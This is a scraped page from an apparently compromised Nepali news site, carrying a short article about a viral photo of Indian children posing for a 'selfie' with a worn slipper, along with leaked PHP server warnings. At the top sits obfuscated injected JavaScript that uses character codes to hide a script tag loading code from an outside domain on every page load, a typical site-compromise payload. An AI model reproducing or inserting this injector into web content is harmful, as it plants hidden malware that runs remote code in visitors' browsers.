Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/includes/hooks.php on line 259

Warning: Cannot modify header information - headers already sent by (output started at /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/jetpack/sal/class.json-api-date.php:1) in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/post-views-counter/includes/counter.php on line 294
“चप्पल सेल्फि” मन छुने भाइरल कथा – Nepali News Portal – Trending Nepali News

“चप्पल सेल्फि” मन छुने भाइरल कथा

काठमाण्डौ । एउटा यस्तो सत्य क्षण अथवा भनौ यस्तो तस्बिर, जस्ले मन छुने मात्रै हैन आखा पनि रसाउछ । यहि तस्बिर समाजिक सन्जालमा भाइरल बन्न पुगेको छ । पछिल्लो समय धेरै आश्चर्य जनक र रोचक कुराहरु सामाजिक सन्जालमा भाइरल हुने लहर बढ्दो छ । त्यस्तै हाल मात्रै यस्तो तस्बिरले भाइरलको स्थान पाएको छ जस्ले साधारण जनता मात्र नभइ कलाकारहरुले पनि यस तस्बिरलाइ आफ्नो सामाजिक सन्जालको खातामा पोस्ट गरेका छ ।

तस्बिर हो ५ बालकहरुको जस्ले सेल्फि पोज दिएर फोटो खिचाएका छन । सोच्दै हुनुहुन्छ होला कि, के ठुलो कुरा हो र भनेर, तर यो सेल्फि कुनै स्मार्ट फोन अगाडि राखेर दिइएको पोज थियो । न त कुनै साधारण फोन नै त्स्राइएको थियो । थियो त मात्र एउटा थोत्रो चप्पल । थोत्रो चप्पल समातेर, हात अनुहार भन्दा केहि अगाडि राखेर सेल्फिको पोज दिएका छन । यो तस्बिर भारतिय बालबालिकाको हो, तर यो तस्बिर खिच्ने व्यक्ति हो हुन भन्ने चाहि खुलेको छैन । त्यो थोत्रो चप्पलको अगाडि तस्बिर खिच्नको लागि पोज र मुस्कान तयार छ तर हातमा भने चप्पल मात्रै छ, जसमा त्यो क्षण कैद हुन सकेन ।

यो तस्बिरलाइ लिएर सामाजिक सन्जाल अहिले तातेको छ भने बलिउड कलाकारहरुले पनि यो तस्बिर शेयर गर्दै मार्मिक र कारुणिक भनिरहेका छन । अमिताभ बच्चन, अनुपन खेर, बोमन इरानी र सुनिल शेट्टी र फोटोग्राफर अतुल कास्बेकर लगायतले आफ्नो व्यक्तिगत बिचार व्यक्त गरिरहेका छन ।

nepalitvshow

nepalitvshow

Read Next

रवि पत्नि निकिताले चलचित्र बिकास बोर्डको अध्यक्ष पदबाट राजीनामा दिनुको कारण यस्तो

Leave a Reply

Your email address will not be published. Required fields are marked *


Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13

Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13

Warning: session_start(): Cannot start session when headers already sent in /homepages/6/d281313289/htdocs/clickandbuilds/NepaliNewsPortal/wp-content/plugins/unyson/framework/helpers/class-fw-session.php on line 13